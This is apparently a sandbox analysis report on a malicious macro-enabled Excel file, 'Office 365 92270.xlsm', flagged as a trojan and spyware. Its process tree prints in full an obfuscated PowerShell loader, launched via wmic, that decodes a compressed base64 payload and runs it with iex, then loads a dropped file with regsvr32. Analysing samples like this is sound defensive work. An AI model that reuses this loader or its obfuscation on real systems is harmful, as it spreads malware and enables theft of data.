Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

Office 365 92270.xlsm

windows7_x64

10

Office 365 92270.xlsm

windows10_x64

10

Analysis

  • max time kernel
    113s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    13/07/2020, 12:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Office 365 92270.xlsm

  • Size

    35KB

  • MD5

    3387406ff10f4b2eddf8736429265604

  • SHA1

    f996ae36d7c2d8b98e1a5174c2a31c86b77a2b38

  • SHA256

    c898e064e2030566e29594c3ef3cbe6720304861fb0126dfed0477de444d63c4

  • SHA512

    8b5b4e0618fa30f1a2125a429cfcf0b41ab54664055c8ce8ec94ef1796a663a1668118f2d5fb03c4c59ad923a1ffcb8889589b9bec7d8ec26147ef2876ada2c0

Score
10/10
evasionspywaretrojan

Malware Config

Signatures

  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Modifies registry class 280 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Office 365 92270.xlsm"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: AddClipboardFormatListener
    PID:316
    • C:\Windows\System32\Wbem\wmic.exe
      wmic pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Process spawned unexpected child process
      PID:792
  • C:\Windows\System32\WindowsPowerShell\v1.0\pOwershElL.exe
    pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('utf'+'-8') ('i'+'o'+'.STrEa'+'MreA'+'deR')(( &('u'+'tf-8') ('IO.'+'co'+'M'+'PREsS'+'Ion'+'.DE'+'fLAtEST'+'rEam')( [sYsTem.IO.MemorYSTReAm][sYStEM.CONVeRT]::fRomBASE64StRinG( ('bVVrc9o'+'4FP0rDuOt5AJOoE03'+'CcPsEvIoKcmmhYXtUqZ2jCBq/CC2TEJd/fc9VyYkmdkPIKH7'+'Ojr36GIXay/UbcZadpHp9h6WhW43sFxdYd1726Cj2Puh25zlrMpufOZUOZulEj/yiDmteR4HSiaxddnkdtH7qJ3CLjdult9kKpXxglNax6qnYhn6geCszmp2se5r5+Xh4OmwlQqVp7FlF9+1flHgE/KMkV/O+Q5/w9lQZKoOHN0EX3EsyI12DFm7FD4GhmU'+'oFWe7zJk0p+4wldFpPOPMIp/jfD4X'+'6UD+FFbjA0KSPFZWw'+'6oLH7EDbdXvcymU4xQbPPtAYxeX3icw5hNlay/CNqZ'+'tx+sQRzEBUDIDMXYReF06SyKcWfjsLkWagD9DtzFiCbYYLRM0QB9wt6jJHM5dzhYIfIgk8HI2lvG75veAakRLaoASa'+'bbGJqOqguos02'+'RGlkAxx3HzXM4oqQDM'+'W0VODN1bZkeEBkhKGBO7ONf'+'TanmJKnMDOG0tma4'+'Z87ZRFuPfTop97bCaycH+YAgdDHQLfSHkd0BOJcGwuLf2oYdCeDO67OlLTezVDjbQYJjpKun'+'sgspTOrFlxUXnDADdAhuDko'+'gR8Pv4pNK/CbGKo905DKbCVk8W6ekr9E1lPnrHVGgdaSLBpFohomFVroRyx+KmG0p'+'h'+'395UWrjCo'+'FdW8ZGfRB8KIqzbpFOYczUn2R3QTyQ6LxPVR77jmOiRiQ7wXTlJHuIw8Wcnvr'+'KjuwqAJF7nBKrgk'+'+6tn06mU0o4enUXE22KIWWYi79ix+Wl2wYPPqHYFiEv9LoXr5I7UToSPSZf6TUnLZhcjlO/SGT8zMvQOzsnYsTVyDvyhqeXS9J4JAH'+'RLgB0o8BAGnqN96835ZkgPdVTP54ZQVKN2I/Es1AqbvF'+'e23TpMZUwwVX2jfqLAtRpmFaXZDOsvBoYRncL'+'g3Gp2xMZqymcI/0WsykmjH3vc0db29hURMlKvA687lNuOPp4zEZPbMf0nt6LHxpusswsqVhkK+rCu6Z5hj88qjoUj8o9jYNkBlDTo6O/h2cHzwNp5HVQ76'+'f3D828YkA'+'TYNJN4pVIF'+'XzP0iQ69jPx4f3g6U7/eo8vp9vAp/GWpMIPbmGVSluSzgF7QgNoSmnRnT+5uYx3PaTrrDB03GFC8umkqb82'+'xp4yU2Plm7fX84aog8zYX4QUhNdp0aX6ICJU2Eq4uAFNPDLAqVqlagttVdvWJEDyKZ8cr5UA670h4blAMKbAzWOSPhmuvaUypr7+'+'DW0igGXOqWNG5cobUfHQu+9o98vmXXK'+'KC8vRMq1WdipOraTbPRdqS9U5/hta'+'E5m4cxkKsDlOpRKdMKTKGewPusafL7xa6Veya+7tQXgOUmAm'+'kd8CM42VGn7QjtsX8ULdbqhYon3iEezT483MExRLuDabRiqkj3pmAksHQcI3Dof/h7Av4yeEE6hKPML2NJPMeK9xzr5+/n1GeUFK3+8Ki4PyzpfpwWF1s2lsNvv7Tq3cHTaJqOgOxPwH'))"\"+ ([ChAR]44).ToStrinG() +"\"[Io.ComprEssion.ComPreSSIoNmODE]::DecOMpREsS))"\"+ ([ChAR]44).ToStrinG() +"\" [SYsteM.tExT.EncODiNg]::AsCII)).REaDtOEnD( )"\")
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Modifies system certificate store
    PID:1388
    • C:\Windows\system32\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\RGI28E5.tmp.
      2⤵
        PID:1656

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/316-0-0x0000000006660000-0x0000000006760000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/316-1-0x0000000006660000-0x0000000006760000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/316-2-0x0000000007449000-0x000000000744A000-memory.dmp

      Filesize

      4KB

      Download

    • memory/316-3-0x000000000744A000-0x000000000744C000-memory.dmp

      Filesize

      8KB

      Download